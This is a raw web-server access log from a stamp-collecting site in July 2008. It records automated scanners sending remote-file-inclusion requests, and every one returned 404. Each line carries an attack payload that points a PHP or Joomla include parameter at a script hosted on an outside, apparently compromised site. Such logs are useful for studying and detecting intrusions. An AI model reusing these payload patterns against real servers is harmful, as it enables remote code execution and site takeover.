203.22.204.188 - - [06/Jul/2008:18:21:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
203.22.204.188 - - [06/Jul/2008:18:21:50 -0700] "GET /logs/access_080526.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:21:50 -0700] "GET //common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:21:50 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
203.22.204.188 - - [06/Jul/2008:18:21:53 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
116.40.122.120 - - [06/Jul/2008:18:22:24 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.38.22.250 - - [06/Jul/2008:18:23:26 -0700] "GET /logs/access_080609.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.38.22.250 - - [06/Jul/2008:18:23:26 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.38.22.250 - - [06/Jul/2008:18:23:26 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:18:25:13 -0700] "GET /order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
64.38.22.250 - - [06/Jul/2008:18:25:21 -0700] "GET /logs/access_080428.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cabildoonline.com/html/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:18:25:30 -0700] "GET /logs/order/login.php?svr_rootscript=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:33 -0700] "GET /logs/access_080519.log//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:33 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:34 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:34 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:34 -0700] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
195.135.183.134 - - [06/Jul/2008:18:25:35 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
201.212.0.39 - - [06/Jul/2008:18:27:37 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:18:27:42 -0700] "GET /senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:27:43 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:27:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:18:27:59 -0700] "GET /logs/senetman/html/index.php?page=http://monmild.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:29:32 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:29:33 -0700] "GET /errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:29:33 -0700] "GET /logs/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:25 -0700] "GET /logs/access_080609.log//urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:27 -0700] "GET //urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:31 -0700] "GET /logs//urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:31 -0700] "GET /logs/access_080609.log//urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:33 -0700] "GET //urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.236.255.134 - - [06/Jul/2008:18:31:34 -0700] "GET /logs//urlinn_includes/config.php?dir_ws=http://www.ladrisursa.com.ar/language/english/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:18:31:35 -0700] "GET /logs//index.php?option=com_gmaps&task=viewmap&Itemid=&mosConfig_absolute_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:18:31:35 -0700] "GET //index.php?option=com_gmaps&task=viewmap&Itemid=&mosConfig_absolute_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:18:31:35 -0700] "GET /logs/access_080428.log//index.php?option=com_gmaps&task=viewmap&Itemid=&mosConfig_absolute_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:32:09 -0700] "GET /logs/impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:32:09 -0700] "GET /impex/ImpExData.php?systempath=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
193.178.228.12 - - [06/Jul/2008:18:35:49 -0700] "GET /logs/access_080602.log/errors.php?error=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.58.78.39 - - [06/Jul/2008:18:38:25 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:40:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:40:21 -0700] "GET //skin/zero_vote/error.php?dir=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
88.255.236.6 - - [06/Jul/2008:18:42:15 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.255.236.6 - - [06/Jul/2008:18:42:20 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:18:43:21 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:18:43:21 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
202.28.66.23 - - [06/Jul/2008:18:46:40 -0700] "GET /admin_modules/?config[path_src_include]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.28.66.23 - - [06/Jul/2008:18:46:40 -0700] "GET /admin_modules/?config[path_src_include]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:46:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:46:51 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:46:52 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:47:20 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:47:23 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:47:23 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:47:24 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:47:53 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:51:14 -0700] "GET //main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
116.125.113.115 - - [06/Jul/2008:18:51:14 -0700] "GET /logs//main.php?sayfa=http://www.luck.ro/poll/r0x.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:51:38 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:52:20 -0700] "GET /logs/access_080602.log///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:52:21 -0700] "GET ///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:52:21 -0700] "GET /logs///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [06/Jul/2008:18:54:01 -0700] "GET ///www.doomhammerallianceraiding.com/phpraider/authentication/phpbb3/phpbb3.functions.php?http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:58:46 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:58:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:58:52 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:18:59:10 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:18:59:11 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:59:16 -0700] "GET /logs/access_080602.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:59:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:59:17 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:59:26 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:18:59:51 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:08:12 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:08:12 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:08:13 -0700] "GET /logs/access_080602.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:19:10:53 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:19:19:05 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.48.194 - - [06/Jul/2008:19:20:09 -0700] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
70.85.48.194 - - [06/Jul/2008:19:20:09 -0700] "GET /logs/errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:19:24:48 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:19:24:54 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
201.3.74.226 - - [06/Jul/2008:19:25:01 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:19:26:19 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:19:26:19 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:19:26:20 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:19:26:54 -0700] "GET /logs/access_080602.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:19:26:55 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:19:26:55 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.19.130.218 - - [06/Jul/2008:19:27:03 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
67.19.130.218 - - [06/Jul/2008:19:27:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.infostec.net/ids/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
89.108.66.101 - - [06/Jul/2008:19:28:15 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:19:28:53 -0700] "GET /logs/access_080609.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:19:29:07 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
85.25.142.64 - - [06/Jul/2008:19:29:07 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:37:02 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:19:37:43 -0700] "GET /logs/access_080526.log//init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:19:37:43 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:19:37:44 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.64 - - [06/Jul/2008:19:41:43 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://admin.devilix.org/~ahmad83/download/acc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.108.124.54 - - [06/Jul/2008:19:42:25 -0700] "GET /logs/access_080602.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.108.124.54 - - [06/Jul/2008:19:42:26 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
89.108.124.54 - - [06/Jul/2008:19:42:26 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.elnavegantedigital.es/components/pay/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
